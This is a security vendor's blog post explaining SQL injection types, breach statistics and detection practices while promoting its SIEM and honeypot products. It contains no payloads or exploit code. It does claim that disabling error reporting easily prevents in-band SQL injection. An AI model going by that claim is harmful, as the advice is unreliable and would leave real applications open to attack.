What is an SQL Injection (SQLi)?
SQL injection (SQLi) is one of the most common code-injection techniques used to get information from one’s database. Generally speaking, this is malicious code placing in one’s database via a page input, most often a registration form.
SQL injection usually occurs when you ask a user for input, like their username/user ID, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.
A hacker might get access to all the user names and passwords in a database, by simply inserting a small piece of SQL code, most commonly in the login form, but also any other types of forms available on the website – and even your website chatbot!
Do SQL Injections still work in 2021?
23 years after their initial exploitation, SQL injections still remain one of the top reasons for security breaches. And the reason is simple: SQL injections are still out there just because they still work. As long as there are so many vulnerable Web applications with databases full of monetizable information behind them, SQL injection attacks will continue.
Akamai’s State of the Internet Security reports that in 2020, the global video game industry suffered more than 240 million web application attacks, which is a 340% increase over 2019, as more people turn to digital entertainment to tide over the pandemic. The top attack vector was SQL injection(SQLi), or 59% of all attacks against the gaming industry, which targets player login credentials and personal information.
Earlier this month, Electronic Arts (EA) has confirmed that hackers gained access to some of its systems and managed to steal source code.
As we previously discussed, government data breaches gain speed since 2019, the more they digitally transform. In the summer of 2019, it was revealed that the tax data of millions of Bulgarian citizens have been stolen. The attacker sent a link to approximately 10 GB of data of stolen citizen data from the Bulgarian National Revenue Agency. Records supposedly contain tax data for 5 million citizens over a span of 10 years. It was later discovered that an SQL Injection was used to acquire sensitive data about nearly the whole population of a country.
This said, it seems that SQLi will not only be widely used in 2021, but they also evolve. Most SQL injections get automated, and their purpose is to attack the most vulnerable websites, which happen to contain sensitive data.
What is the purpose of an SQL Injection?
Types of SQL Injections
There are several types of SQL injections (or SQLi):
- In-band SQLi – this technique is used when the attacker is able to inject the code and gather results using only one communication channel. It has two divisions:
- Error-based SQLi – this technique relies on the error messages thrown by the database server to get more details about the structure of the database.
- Union-based SQLi – this technique allows the UNION SQL operator to combine the results of the SELECT statements to a single one which is then returned as an HTTP response. To do this, you need to know a valid table name, as well as the number of columns of the first data table and their type.
How to prevent In-Band SQLi?
Always use prepared statements. But that’s programming advice. What if you can’t change the source code?
It’s relatively easy to prevent such attacks, as long as you disable error reporting.
- Inferential SQLi – this type is also called “blind” attacks because the attacker is not able to “see” the result of the attack. Instead, the attacker could reconstruct the database structure by sending:
- Boolean-Based SQLi – this technique sends a query to the database which returns True or False. Based on this result, the content on the HTTP will either change or will remain the same. Even though the attacker doesn’t get any database results, it lets him understand the database logic. This “blind” technique is very slow due to the fact that the attacker might need to guess every single character. But it still can result in a lot of damage for the company.
- Time-Based SQL – this technique sends an SQL query to the database forcing it to wait for a certain amount of time before responding. The response time will give information to the attacker whether the result is TRUE or FALSE. This attack is very similar to the Boolean-based one and is also a slow one.
- Out-of-Band SQLi – this attack is used when the attacker is not able to inject the code and gather results using only one communication channel. Such a technique relies on the database server’s ability to make DNS or HTTP requests to deliver data to the attacker.
Why is it essential to use real-time tracking with detailed reporting?
In order to be able to detect such attacks in real-time and prevent any kind of data breach, it is vital to have a tool allowing a Data Protection Officer, a CISO, or a Quality Auditor to have real-time access to events logs that cannot be manipulated. This helps the organization resolve an issue before it has impacted the company’s assets and reputation. Furthermore, after GDPR went into effect, each company is obliged to ensure that any data breach is being reported to the regulator within 72 hours which requires certain measures to be taken.
SQLi Best Practices for Real-Time Detection and Prevention
As we said, SQL injections are not a new invention. They are here for many years, so cybersecurity specialists have found a way to prevent them. Here are some of the best practices to ensure your data will not get affected by SQLi:
Test Your Forms for Vulnerabilities
It’s important to perform pen tests on any types of forms you have publicly available – and make sure they’re not exposed to cyber threats.
Some tested systems or websites can be very complicated and contain sensitive data, and testing manually can be really difficult, taking a lot of time to perform. In such cases, testing against SQLi attacks with special tools can be very efficient. There are a lot of SQLi automation testing tools on the market that can be considered.
Encrypt Your Data to Prevent Leaks
To add an extra layer of security, it’s recommended to encrypt all your data. This way, the attacker will not be able to read your data unless they have the decryption key.
However, if all of your databases are encrypted with one key, this will not be so hard for an attacker to decode once they have all your data. That’s why we created SentinelDB – a per-record encrypted database. Its technology guarantees strong protection of your data, and at the same time, it does not compromise the overall performance.
Scan Your Code for SQLi
Code injection is not limited to HTML code and query strings. These code injections can also take place in cookies and data files.
Leverage real-time data integrity monitoring tools to ensure that no one has tampered with your data. There are dynamic web vulnerability scanners that can help you with scanning your application. There are others that scan your code in real-time.
LogSentinel SIEM has a built-in Website Integrity Monitoring feature that scans your website code for changes. It helps you detect threats such as:
- Credit Card Theft – stop criminals from stealing customer credit card information
- Credential Theft – stop malicious actors from obtaining customer and employee credentials
- Sensitive Data Leaks – don’t let attackers use injected scripts to leak sensitive corporate data
- Magecart -Magecart is a specific form of form jacking that is affecting thousands of website
Leverage Honeypot to Catch SQLi Attackers
A honeypot is a system mimicking real servers, that is aiming to attract hackers and intruders scanning the web for vulnerabilities to attack. When an attacker gains access to the honeypot data, they leave clues so that the security team can take preventive measures on the actual servers, for example, IP address. This way, web application vulnerabilities could be detected as it could be identified how attackers bypass the guards and access the data.
Here are some of the ways to leverage honeypot to prevent SQL injections:
- System Vulnerabilities: The honeypot identify system vulnerabilities as the attacker has scanned for them to access the system
- Methods of the Attack: Identify what methods have been used by the attacker to capture data.
- Purpose of the Attacks: Attacks can be done for different purposes such as capturing, deleting, or altering data in databases. A cybercriminal would try to run malicious scripts on the user’s browser to monitor, redirect to other websites, or even send viruses.
- Frequency of the Attacks: The recorded data on honeypot can also show how often the servers are exposed to attacks
- Attack sources: The IP address of the intruder directs to the source and origin of the attacks
- Patterns of the Attacks: Honeypot logs the process of all attacks so the pattern of a successful attack could be identified among other patterns.
- Tools and Techniques used in Attacks: The recorded information on honeypot shows us which tools and techniques are employed by hackers.
- Prevention of Future Attacks: stored information on honeypot identifies the pattern, frequently, techniques and tools which deployed by the hacker to exploit vulnerabilities on web application so this information can be used for preventing measures.
LogSentinel SIEM has a built-in honeypot feature that helps you detect such attacks and stay away from SQL injections. The LogSentinel SIEM Honeypot is a useful addition to our threat intelligence capabilities and allows for detecting early threats as well as collecting malicious actor behavior data. With LogSentinel SIEM Honeypot, your security team will be able to:
- Early Detect Malicious IPs – by getting an early warning of malicious IPs that are trying to get into your infrastructure, you will be able to take timely measures such as blacklisting them
- Monitor Malicious Actor Behavior – by monitoring and recording malicious actor behavior over multiple protocols (SSH, FTP, HTTP, RDP, SMB, etc) you will be able to constantly improve the security of your servers in accordance with the ever-changing threat environment
- Gain Threat Insights – the honeypot will help you understand how bots and human malicious actors are approaching your infrastructure to help you protect it
- Monitor Overall Threat Level –by monitoring the increase or decrease of malicious attempts by country/region, protocol, and other metrics, you can easily evaluate the risk of SQLi attacks and act accordingly
Leveraging Audit Trail for Real-Time SQLi Detection
You should have the capability to protect servers from getting a security breach and keep your database under control. To be able to tell if a server is vulnerable to SQL injections you will need to monitor for signs of an attack via server logs. This way your security team will be able to react quickly from within LogSentinel’s centralized monitoring dashboard. Thanks to AI technology and the pre-set security rules, you will be alerted in real-time when anomalies occur. LogSentinel SIEM has the built-in capabilities to read website access logs and automatically detect SQLi attempts, sending real-time notifications for SQLi attempts to your IT security team.
If you would like to find out more about how to protect your databases from SQLi injections, leveraging a Next-Generation SIEM, request a quick 30-minute demo with us and we will guide you through the whole process:
Denitsa is a Digital Marketing Analyst at LogSentinel with strong interest in the field of Information Security. She has 5 years of valuable experience in the field of Digital Marketing and Public Relations. Denitsa holds a degree in Journalism from Birmingham City University and has passed various Digital Marketing masterclasses and courses.